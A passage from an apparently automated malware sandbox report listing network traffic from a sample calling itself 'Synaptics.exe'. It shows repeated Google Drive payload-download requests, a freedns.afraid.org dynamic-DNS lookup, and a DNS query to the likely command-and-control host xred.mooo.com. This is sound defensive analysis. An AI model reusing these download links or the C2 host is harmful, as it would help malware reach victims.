Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Rdx1qHcc9WzTHqwFVXWTlo5OQ79k_7b3an6AdO-4-RZ1KQkTmFYPec_zDcrqE2FxHRSM-YpFjXGFlkzrJYQaygQq2mr_K797_l6CIscjMUSJ9NMD18x4yMosRHm7L3NuTWd-R8PzL5_XDm1JiKyXlnB2Aw1G_nylnOgKmEyyzgh-GWpw_vZr53E
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Rdx1qHcc9WzTHqwFVXWTlo5OQ79k_7b3an6AdO-4-RZ1KQkTmFYPec_zDcrqE2FxHRSM-YpFjXGFlkzrJYQaygQq2mr_K797_l6CIscjMUSJ9NMD18x4yMosRHm7L3NuTWd-R8PzL5_XDm1JiKyXlnB2Aw1G_nylnOgKmEyyzgh-GWpw_vZr53E
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Rdx1qHcc9WzTHqwFVXWTlo5OQ79k_7b3an6AdO-4-RZ1KQkTmFYPec_zDcrqE2FxHRSM-YpFjXGFlkzrJYQaygQq2mr_K797_l6CIscjMUSJ9NMD18x4yMosRHm7L3NuTWd-R8PzL5_XDm1JiKyXlnB2Aw1G_nylnOgKmEyyzgh-GWpw_vZr53E
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GiwW7nFNCeCO8Vg7wwsk6suN9RcZZ4j9ZLJR1B3wAEH_GuydJZJ-sUMPZVW2sIgNgfxCBNcZZSXk4njGZn72h6vINgii_8bw5RMoevPRczQyPhXfhuvp4sy08_feQ3U2bfHNMhWC3QWZ20sj7H_3Nhd0PaSAIkRd_FO7N8YvVF9V1NJq24kCijsN
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GiwW7nFNCeCO8Vg7wwsk6suN9RcZZ4j9ZLJR1B3wAEH_GuydJZJ-sUMPZVW2sIgNgfxCBNcZZSXk4njGZn72h6vINgii_8bw5RMoevPRczQyPhXfhuvp4sy08_feQ3U2bfHNMhWC3QWZ20sj7H_3Nhd0PaSAIkRd_FO7N8YvVF9V1NJq24kCijsN
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GiwW7nFNCeCO8Vg7wwsk6suN9RcZZ4j9ZLJR1B3wAEH_GuydJZJ-sUMPZVW2sIgNgfxCBNcZZSXk4njGZn72h6vINgii_8bw5RMoevPRczQyPhXfhuvp4sy08_feQ3U2bfHNMhWC3QWZ20sj7H_3Nhd0PaSAIkRd_FO7N8YvVF9V1NJq24kCijsN
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: docs.google.com
Source: global traffic	DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic	DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4djF8tObTiUHQz3h8ihG1kgY0137OBSRVc6xv1mW0f_p0acGcGSu7g3nZ-Gso1UXs4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:27 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-oBGSKelAplgDJZbnIgTpCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Rdx1qHcc9WzTHqwFVXWTlo5OQ79k_7b3an6AdO-4-RZ1KQkTmFYPec_zDcrqE2FxHRSM-YpFjXGFlkzrJYQaygQq2mr_K797_l6CIscjMUSJ9NMD18x4yMosRHm7L3NuTWd-R8PzL5_XDm1JiKyXlnB2Aw1G_nylnOgKmEyyzgh-GWpw_vZr53E; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5DwvLyofigdmCBzkwhSKQ7Bt7HoGkDIELYz4cwLBaoCkD_4L9qrY51vJK_sIy9iv4BFyXgIV8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:27 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-AOTni1WutmLSA-Zo2u--Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6CtdWtX3Flsy_-TGUlNY6vOAaIcAeEbjT9TlCiVFh8HgNSWRPC37V0eyV8ft3_Gr4XContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:28 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-aWt6KsbIhFsQ2YSrLU_WQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=GiwW7nFNCeCO8Vg7wwsk6suN9RcZZ4j9ZLJR1B3wAEH_GuydJZJ-sUMPZVW2sIgNgfxCBNcZZSXk4njGZn72h6vINgii_8bw5RMoevPRczQyPhXfhuvp4sy08_feQ3U2bfHNMhWC3QWZ20sj7H_3Nhd0PaSAIkRd_FO7N8YvVF9V1NJq24kCijsN; expires=Tue, 01-Jul-2025 10:25:28 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC74p8eH7ovukR48Hg0K2orSTZ1RKeXWPPHyV-_uqjBi3b-Wueoq-yoo0TK5n04buEkC_i1JBRQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:28 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SJY8LPdL263el29XRT5qpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, 